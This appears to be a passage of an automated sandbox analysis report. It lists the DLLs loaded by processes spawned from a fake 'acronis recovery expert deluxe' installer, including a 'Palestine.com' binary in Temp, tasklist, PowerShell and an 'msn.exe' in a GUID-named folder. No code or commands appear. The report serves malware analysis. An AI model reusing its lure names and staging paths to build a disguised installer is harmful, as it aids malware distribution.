                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: napinsp.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: pnrpnsp.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wshbth.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: nlaapi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: winrnr.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: webio.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: dpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: zipfldr.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.fileexplorer.common.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: shdocvw.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: msimg32.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: msncore.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: msacm32.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: msidcrl40.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: contactsux.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: cryptnet.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: sensapi.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: oleacc.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: winmmbase.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeSection loaded: winmmbase.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe Section loaded: dbghelp.dll
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe Section loaded: shdocvw.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: wtsapi32.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: winsta.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: textinputframework.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: coreuicomponents.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: coremessaging.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: shfolder.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: rstrtmgr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: slc.dll
